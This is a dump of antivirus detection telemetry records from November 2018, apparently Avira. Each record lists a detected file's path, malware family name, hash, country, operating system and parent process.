  Row(detection=Row(filename='mypublicwifi.exe', filepath='D:\\hakimdede-vpn\\MyPublicWiFi.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='c6f4691a6533a22b437a3cee2624ff9e6428d9d838579da786a573f7db17184b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T14:00:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-180411-c24038be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3daed65c\\AVSCAN-20181031-174609-5DBCCF40\\AVSCAN-20181031-180411-C24038BE', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='99e71be7ddf4acc85e2152d498541a6257cad81fd966235e7f25d1140f9936ec', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:04:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000515-3caf5d06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60d9d041\\AVSCAN-20181102-000457-38E12902\\AVSCAN-20181102-000515-3CAF5D06', filesize=1024000, name='HEUR/APC.#M1.#R1'), hash='b39e00e952ed7c52f2cdc537e8eb5b45ba3a589b8b24b11229aa872a31c1694d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:05:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='6fc6e123109375b69e5e8a00ad949fc53433947bfc9551f2cef91c11c9afaf68', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T10:00:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111616-2dff8061', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ae1d9bb\\AVSCAN-20181101-111531-26FF4912\\AVSCAN-20181101-111616-2DFF8061', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001a88', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001a88', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002858-62a42308', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002858-62A42308', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:29:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rj2s2b0', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RJ2S2B0', filesize=64000, name='VBA/Dldr.Agent.jukqc.#M1.#R1'), hash='5683af30e18e6be9c15efdae5a762aee27e478307b1ee82893f43d8809dd2c74', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='65 руп декоративная косметика и грим.exe', filepath='F:\\Парикмахеры РУП иКТП  изменения\\ПАРИКМАХЕРЫ РУП готовые\\65 РУП декоративная косметика и грим.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='838530512c259a7b094414b8a9871f005482818430e73742bc607990f6e9ac68', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:36:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170814-9d6a8763', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-170814-9D6A8763', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:08:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\UserData.db\\MSieXEc64.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:10:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:00:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2a4716f9c0e46f244b36ffdcbff7b3643b6b517416d4014c8765f831e29da06e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2A4716F9C0E46F244B36FFDCBFF7B3643B6B517416D4014C8765F831E29DA06E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a4716f9c0e46f244b36ffdcbff7b3643b6b517416d4014c8765f831e29da06e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:25:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T14:08:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003320-7f031788', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003320-7F031788', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:33:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0007e2c7', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp0007e2c7', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:44:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ad-aware-522-downloader.exe', filepath='C:\\Users\\X\\Desktop\\Medion\\Datensicherung Medion\\MKnetzger\\Downloads\\ad-aware-522-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='7cfbe228740d995a5a99972e9e7fc5849f8de1bbdea59dfcab61d15ec902eee3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Y9tHYuwhR0uiy3CV.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T10:17:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:13:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:36:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:25:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setupmda2769a.exe', filepath='D:\\SetupMDA2769a.exe', filesize=35264000, name='W32/Sality.AT.#M1.#R1'), hash='1cbf877fc51334a3fecbb3af7f127735107ae7addd029054611fe36e204b5b0f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T02:09:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215356-12ec3590', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9c9b8cea\\AVSCAN-20181101-211938-33E69CE4\\AVSCAN-20181101-215356-12EC3590', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:53:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa19028.25339\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa19028.25339\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:15:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:47:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184138-36ece3a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41c160bd\\AVSCAN-20181101-184041-2D9430CB\\AVSCAN-20181101-184138-36ECE3A1', filesize=2048000, name='TR/RedCap.gblsf.#M1.#R1'), hash='850d55400b4b6ec3ddcf70a5fae5cbff91c81b8dcf9fff2bc47717cf99dbba48', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T16:41:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8396f6400c35a0c89e1e4e96d5323c173eea9a93', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8396f6400c35a0c89e1e4e96d5323c173eea9a93', filesize=2944000, name='TR/Crypt.EPACK.Gen2.#M300.#R100627'), hash='369e82ed6d1929e1e846ac2b2cea485a8434fb4043412bf35559b4840907e760', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fonts.exe', filepath='F:\\Fonts.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='teracopydisable.exe', filepath='K:\\HBCD\\Programs\\TERACOPYDISABLE.EXE', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\windows\\syswow64\\config\\manual\\1\\2\\3\\1\\1\\1\\1\\1\\1\\2\\3\\1\\1\\1\\tib\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.82.#M1.#R1'), hash='9d4f0082ca27b8ec25f8b7ba843e8ee360efab2c8fcdf00066e6700bdfcbc75e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T23:00:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a23ef7e9000c4f57a594d3c282c6c755db0866e3b3155145ad98515a2d131e00', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A23EF7E9000C4F57A594D3C282C6C755DB0866E3B3155145AD98515A2D131E00', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a23ef7e9000c4f57a594d3c282c6c755db0866e3b3155145ad98515a2d131e00', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:11:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\idcumqyqomh\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540976535.5bd96f97ae40b', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Emtak\\83764871.exe', parentsize=670720, timestamp='2018-11-01T00:24:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='schede da rivedere.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI\\schede presentazione corsi\\schede da rivedere.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sambalpuri lok tihar-2018.exe', filepath='F:\\sambalpuri lok tihar-2018\\sambalpuri lok tihar-2018.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:38:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8c2b4b1d2aa59333c01e93832a633661ec970bd77b3a82002407850b5b561081', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\8C2B4B1D2AA59333C01E93832A633661EC970BD77B3A82002407850B5B561081', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8c2b4b1d2aa59333c01e93832a633661ec970bd77b3a82002407850b5b561081', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:24:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\Hasani\\AppData\\Local\\Temp\\dtzk5w2zw3n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M2.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152402-4d228b9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152402-4D228B9B', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:24:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='penilaian pak tahap 2 periode oktober dari pak agus.exe', filepath='F:\\PENILAIAN PAK TAHAP 2 PERIODE OKTOBER DARI PAK Agus\\PENILAIAN PAK TAHAP 2 PERIODE OKTOBER DARI PAK Agus.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150132-9e1c66ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150132-9E1C66BA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='project work.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\PROJECT WORK.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\n4gfu2d34q3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T04:16:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9254ec53a7518aca7468ff500b090a1d81a903035015be2127e6bd9c7590038c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T18:54:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150236-aa44298a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150236-AA44298A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:02:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diseñosepa                                   .scr', filepath='E:\\Diseñosepa                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154615-cefde544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154615-CEFDE544', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jkh.open.info.tariff.warm план 2011.xls', filepath='D:\\СОФТ\\ФЛЕШКА\\надежда\\тарифная\\Стандарты раскрытия информации\\план\\JKH.OPEN.INFO.TARIFF.WARM план 2011.xls', filesize=1408000, name='W97M/Agent.4231.#M1.#R1'), hash='c1f266ea1c4eb0889ef1bb5e36c55cbce32dbe6264319f7eb6245f05cb600f5e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:35:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152013-74e2edf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152013-74E2EDF1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:20:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094805-28836712', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094805-28836712', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:48:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='433416dd0d21d6c24828ce4e913a098a84dbf271029820ab72b541820b022681', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T13:06:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240da', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240da', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:43:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132934-b0ac5407', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_8be28640\\AVSCAN-20181104-131239-138C782E\\AVSCAN-20181104-132934-B0AC5407', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='71f1a8ead056e855f60c676e8718f6723d70e464f4eabb864af9a1f8d7651871', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:29:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\System32\\CastSrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:17:05Z'), dt=datetime.date(2018, 11, 4)),
